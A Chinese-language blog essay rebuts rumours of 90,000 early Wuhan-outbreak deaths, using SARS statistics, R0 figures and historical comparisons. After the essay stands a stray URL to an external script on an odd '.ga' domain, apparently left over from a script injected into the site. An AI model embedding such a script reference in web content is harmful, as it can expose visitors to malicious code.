分類
隨筆

隨筆

SARS全球疑似感染案例才8千多人,死亡774人。

中國SARS疑似病例5,327,死亡349(死亡率6.55%);台灣疑似病例346,死亡37(死亡率10.69%);香港疑似病例1,755,死亡299(死亡率17%)。統計時間從2002年11月16日廣東順德首例發現病患到2003年9月2日,時間近一年。

網路謠傳武漢肺炎已經造成短時間內9萬多人死亡(不到2個月時間),試問如此巨量屍體要怎麼處理?這個時間點武漢上哪找那麼多工作人員處理屍體?掩埋要埋哪?就算萬惡的中共要火化毀屍滅跡,焚化爐也不夠支應。

更甭提目前英國Lancaster醫學院提出的學術研究認為武漢肺炎基礎傳染數 (R0, Basic reproduction number,簡言之:平均一個人可以傳染給多少人) 大約為 3.6-4.0。順道一提:SARS是0.85-3,HIV/AIDS是2 – 5。

當年南京大屠殺,屠殺30萬人也要耗時2個月。即便當年資訊流通與記錄都困難重重下,還是被拍攝記錄並流出屠殺相關影像訊息。

以現在人人有手機的狀況,武漢短時間死了9萬人,卻沒有任何影像照片流出?9萬人都沒家人?

就算是1918年西班牙大流感,美國死了548,452人,那也是將近2年時間。美國也沒有因此亡國。

恐慌時,人容易過度主觀放大風險機率,這是正常的心理現象。但保持理智才是提高自身存活率的最佳方法。

最可悲的是毫無判斷能力地不斷造謠或協助造謠,把很多明顯誇大不實的謠言只為滿足自身政治偏見地散佈出去,但其實自己連基本查證或一丁點證據都拿不出來。

當年SARS期間台灣有多少誇張謠言?事後來看根本都是不堪查證的蠢話。

事實上台灣2016年死於肺炎就有12212人,平均每天33人。而且肺炎死亡率高出日本及韓國,更是美國的6.4倍。真要比較,SARS一年造成的台灣死亡人數不過是他種肺炎一天的造成的死亡人數。

不堪但悲哀的事實是,武漢肺炎不僅僅危害人體健康壽命,更成為一場可笑的智力測驗。

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s